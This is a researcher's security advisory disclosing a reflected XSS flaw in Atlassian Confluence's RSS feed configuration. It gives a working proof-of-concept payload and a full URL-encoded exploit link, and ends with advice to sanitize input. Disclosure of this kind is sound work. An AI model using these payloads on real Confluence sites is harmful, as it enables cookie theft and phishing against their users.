Atlassian Confluence, the Enterprise Wiki Reflected XSS Details ============================================================================== Product: Atlassian Confluence 3.5.6 till 5.3(latest version), the Enterprise Wiki Security-Risk: Critical Remote-Exploit: yes Vendor-URL: http://www.atlassian.com Advisory-Status: Not Published Credits ============================================================================== Discovered by: Muhammad Waqar Affected Products: ============================================================================== Atlassian Confluence 3.5.6, the Enterprise Wiki till latest version Atlassian Confluence 5.3 Description ============================================================================== It's a wiki. You can use it to collaborate on writing and sharing content with your team. More Details ============================================================================== I have discsovered a Reflected Cross site scripting (XSS) inside Atlassian Confluence, the Enterprise Wiki , the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ============================================================================== Follow below steps to reproduce: Navigate to this link http://www.example/dashboard/configurerssfeed.action Now you see RSS feed creation options Select any options you want You can see "Advanced Options" click on it and in the input fields put my XSS payload that is "><img src=x onerror=alert(9);> Now click on "Create RSS Feed", it will navigate to another page where you see your inserted javascript executed. Exploit ============================================================================== Created Feed can be use any where and does not need any sort of authentication so it can be easy for cookie stealing and other attacks. http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment& types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys= &sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed Note: This exploit works in FireFox/Opera. Solution ============================================================================== Input provided by the user is not properly sanitized while posting it so it should be sanitized. -- Regards, Muhammad Waqar